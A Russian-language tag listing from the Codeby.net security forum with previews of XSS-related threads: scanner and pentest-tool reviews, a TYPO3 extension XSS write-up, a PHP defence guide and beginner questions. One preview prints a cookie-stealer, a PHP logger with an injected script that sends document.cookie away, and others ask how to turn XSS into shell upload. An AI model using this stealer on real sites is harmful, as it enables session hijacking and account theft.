xss
Всё по теме «xss» на форуме Codeby.net. Обсуждений: 78. Разборы, инструменты и практика по информационной безопасности.
-
Тестируем ресурс с AngelSword
Добрый день,Уважаемые Жители Форума,Друзья и Читатели. В эти выходные довелось провести тест одного ресурса. Как-то убежал из вида при этом интересный инструмент для проведения pentest. Восполняю пробел,так сказать. Создал софт Lucifer1993 - это мощная китайская школа пентеста. Несмотря на...- Vertigo
- Тема
- angelsword pentest sql injection xss
- Ответы: 1
- Раздел: Мои статьи
-
Статья Хакерские плагины для Chrome
Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является Интернет-магазин Chrome. Пусть нас...- Сергей Попов
- Тема
- chrome google chrome hackers toolkit hacktab web security tests hide my ass! web proxy http port scanner tamper chrome web developer windows xss взлом сканеры уязвимостей
- Ответы: 0
- Раздел: Мои статьи
-
F
Решено XSS атака или подставное шоу на 2х миллионную аудиторию?
Всем доброго времени суток! Еще давно наблюдал данный контент и как то было лень опровергать это, да и времени не было, а вот сейчас призадумался, не пи#%шь ли это? (сразу вспомнил шоу идиоты на карамба тв :D) Так вот суть: "Каратель шк" ищет на серверах (кс-го) школьников которые хотят обмануть...- fakecop
- Тема
- xss
- Ответы: 3
- Раздел: Общение и нетворкинг
-
Эксплуатация XSS
Начал изучать xss. Сразу появился вопрос. Если ресурс уязвим к данной атаке, можно ли с помощью этой уязвимости, загрузить на атакуемый сервер payload и получить доступ к серверу?- Doctor zlo
- Тема
- xss
- Ответы: 3
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Kill Shot-Инструмент для тестирования на проникновение
Добрый вечер,Уважаемые Форумчане и Друзья. Сегодня вам хочу представить интересный небольшой framework. Создателем этого замечательного инструмента является Bahaabdelwahed. Арабская школа пентеста. В killshot входят многие модули расположенные для удобства тестирования в подменю. Начинать...- Vertigo
- Тема
- killshot pentest rce sql xss
- Ответы: 9
- Раздел: Мои статьи
-
Статья Получаем XSS на сайте через .docx файл
Всякий раз, когда я вижу форму загрузки файла во время теста , я обращаю на это внимание. В лучшем случае я могу загрузить обратную оболочку(shell) на языке сценариев, доступном на веб-сервере. Если приложение работает например на PHP или ASP, это становится довольно легко. Если я не могу...- Tayrus
- Тема
- .docx word xss
- Ответы: 1
- Раздел: Мои статьи
-
P
Для начального и глубокого освоения XSS атак с чего начать?
Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...- p0stman
- Тема
- html xss javascript xss
- Ответы: 6
- Раздел: Языки программирования
-
Статья Typo3. xss уязвимость расширения.
Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным). Так вот при создании новости на сайте, можно внедрить свой ява-скрипт код. Он отрабатывается и в поле...- Lisenok
- Тема
- tt_news typo3 xss
- Ответы: 0
- Раздел: Мои статьи
-
Проблема Проблема с XSS
Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...- Tayrus
- Тема
- xss
- Ответы: 5
- Раздел: Общение и нетворкинг
-
K
HACKER101
Статья для участия в конкурсена codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения которые получились у меня. level...- kimnatsau
- Тема
- csrf xss
- Ответы: 6
- Раздел: Этичный хакинг и тестирование на проникновение
-
S
XsSCan - Web Application XSS Scanner
XsSCan - это инструмент python для поиска уязвимостей Cross Site Scripting на веб-сайтах. Этот инструмент является лучшим в своем роде. Вместо того, чтобы просто проверять одну страницу, как это делают большинство инструментов, этот инструмент просматривает весь веб-сайт и сначала находит все...- Sniff
- Тема
- xss сканер
- Ответы: 2
- Раздел: Арсенал специалиста по ИБ
-
Статья Защита от XSS атак в PHP: полное руководство разработчика [2025]
Введение: почему XSS — это критично В 2024 году через XSS-уязвимости было скомпрометировано более 2 миллионов пользовательских аккаунтов. British Airways выплатили £20 млн штрафа за утечку данных через XSS. Если вы разрабатываете на PHP и не защищаетесь от XSS правильно — вы следующий. Эта...- r0hack
- Тема
- php r0hack xss безопасность php
- Ответы: 8
- Раздел: Безопасность веб-приложений
-
CTF - делимся решениями, обсуждаем
Не много тем про CTF, а ведь многие именно благодаря этим соревнованиям, начинают интересоваться ИБ и хакингом. Поэтому предлагаю, делится решениями нестандартных тасков, да и в общем продвигаться в этой области на форуме. В перспективе собрать команду Codeby, можно даже несколько, уверен...- r0hack
- Тема
- burp suite ctf web xss безопасность соревнования энтузиазм
- Ответы: 50
- Раздел: HackerLab: практика и соревнования
-
I
Статья Обнаружение SQL-инъекций с дорками: обзор V3n0M-Scanner
Всем привет! Сегодня будет небольшой обзор утилитки под названием V3n0M-Scanner. Самая стоящая функция сканера - поиск SQLi- и XSS-уязвимостей в на веб-сайтах с помощью дорков. А база дорков у V3n0M просто колоссальная: более 14 000 штук! Если буду где-то через чур углубляться в подробности, то...- Inject0r
- Тема
- google dorks scaners sql injection sql-инъекция v3n0m-scanner web application attack xss веб-безопасность инструменты безопасности кибербезопасность уязвимости
- Ответы: 24
- Раздел: OSINT и Форензика
-
XSStrike-Fuzz and Bruteforce Parameters for XSS
Приветствую Уважаемых Друзей,Форумчан и Дорогих гостей нашего форума. Сегодня обзор будет о инструменте-сканере xsstrike от замечательного автора UltimateHackers Сомневался по-поводу целесообразности обзора. Но т.к.сведения о сканере начали активно распространяться,решился. В задачи...- Vertigo
- Тема
- fuzzer scanner xss xsstrike
- Ответы: 2
- Раздел: Этичный хакинг и тестирование на проникновение
-
XSS уязвимость ( WordPress )
Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )- Dosia
- Тема
- wordpress xss
- Ответы: 5
- Раздел: Анализ уязвимостей и исследования
-
Статья Лучшие Android-инструменты для пентестинга и кибербезопасности 2025
Доброго времени суток, друзья! Предлагаю создать здесь полезный и постоянно пополняемый список Android-утилит и приложений, которые мы, специалисты по кибербезопасности и энтузиасты, используем для тестирования на безопасность, анализа сетей и просто для повседневных задач. Для тех, кто...- <~DarkNode~>
- Тема
- android android pentesting android tools drozer mitm orbot sql-инъекции termux xss андроид андроид пентест кибербезопасность мобильная безопасность пентестинг приложения сетевой анализ софт для андрои хакинг
- Ответы: 26
- Раздел: Сетевая безопасность и беспроводные атаки
-
Статья Расширения Firefox для пентестинга: ТОП плагинов для веб-анализа
Если вы профессиональный пентестер или опытный специалист по кибербезопасности, то наверняка уже знакомы с мощными инструментами, о которых пойдет речь. Изучать инструменты для хакинга и пентестинга всегда интересно и увлекательно, ведь они созданы гениальными программистами и максимально удобны...- Сергей Попов
- Тема
- firefox hack sql-инъекции xss веб-анализ кибербезопасность пентестинг плагины расширения хакинг
- Ответы: 4
- Раздел: Мои статьи